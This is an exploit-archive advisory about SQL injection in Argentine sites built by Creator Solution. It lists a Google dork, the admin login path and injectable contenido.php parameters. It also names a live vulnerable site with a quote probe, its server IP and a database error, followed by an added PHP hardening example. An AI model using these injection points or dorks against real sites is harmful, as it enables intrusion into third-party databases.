
Desarrollado por Creator Solution Argentina SQL Injection

Author: KingSkrupellos, Published: 18-01-2019
####################################################################

# Exploit Title : Desarrollado por Creator Solution Argentina SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/01/2019
# Vendor Homepage : creators.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desarrollado por: Creator Solution" site:ar
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Admin Panel Login Path :
************************

/login.php

# SQL Injection Exploit :
***********************

/contenido.php?tablanom=noticias&indice=IdNoticia&id=[SQL Injection]

/contenido.php?tablanom=estatutos&indice=[SQL Injection]

/contenido.php?tablanom=popular&indice=idpopular&id=[SQL Injection]

/contenido.php?tablanom=historia&indice=[SQL Injection]

/contenido.php?tablanom=documentos&indice=[SQL Injection]

/contenido.php?tablanom=calendario&indice=[SQL Injection]

/contenido.php?tablanom=resultados&indice=[SQL Injection]

/contenido.php?tablanom=reglamentos&indice=[SQL Injection]

####################################################################

# Example Vulnerable Site :
*************************

[+] clubnauticocordoba.com.ar/contenido.php?tablanom=noticias&indice=IdNoticia&id=1'

[ Proof of Concept ] => archive.is/plkpL

Note : (72.29.77.172) => There are 489 domains hosted on this server.

####################################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near '' DESC' at line 1
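
The URLs above let the client name the table (tablanom) and the index column (indice) as well as the row id, so binding id alone does not close the hole. An added example of a hardened handler follows; it is not the vendor's code, which this page does not show. Assumptions: buildContentQuery and CONTENT_TABLES are hypothetical names, and the query is assumed to end in ORDER BY ... DESC, as the trailing DESC in the error suggests.

```php
<?php
declare(strict_types=1);

// Allow-list: table => index column. Only the two pairs the advisory's URLs
// show in full are listed here; a deployment lists every table it serves.
const CONTENT_TABLES = [
    'noticias' => 'IdNoticia',
    'popular'  => 'idpopular',
];

// Hypothetical helper: returns [sql, params], or null when the request must
// be rejected (the caller answers HTTP 400 and runs no query).
function buildContentQuery(array $get): ?array
{
    $table = $get['tablanom'] ?? '';
    // Identifiers cannot be bound as parameters, so the table must match the
    // allow-list exactly. The index column is taken from the server-side map;
    // the client's "indice" value is never placed in the SQL text.
    if (!is_string($table) || !array_key_exists($table, CONTENT_TABLES)) {
        return null;
    }
    $column = CONTENT_TABLES[$table];

    // id is absent from some of the listed URLs; when present it must be a
    // plain positive integer and is passed as a bound value, not concatenated.
    $params = [];
    $where = '';
    if (isset($get['id'])) {
        $id = filter_var($get['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            return null;
        }
        $where = " WHERE `$column` = :id";
        $params[':id'] = $id;
    }
    // Assumed query shape: rows ordered by the index column, newest first.
    return ["SELECT * FROM `$table`$where ORDER BY `$column` DESC", $params];
}

// Constructed sample requests (not taken from any real log).
$ok  = buildContentQuery(['tablanom' => 'noticias', 'indice' => 'IdNoticia', 'id' => '1']);
$bad = buildContentQuery(['tablanom' => 'noticias', 'indice' => 'IdNoticia', 'id' => "1'"]);
var_dump($ok, $bad);
// With PDO: $stmt = $pdo->prepare($ok[0]); $stmt->execute($ok[1]);
```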

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
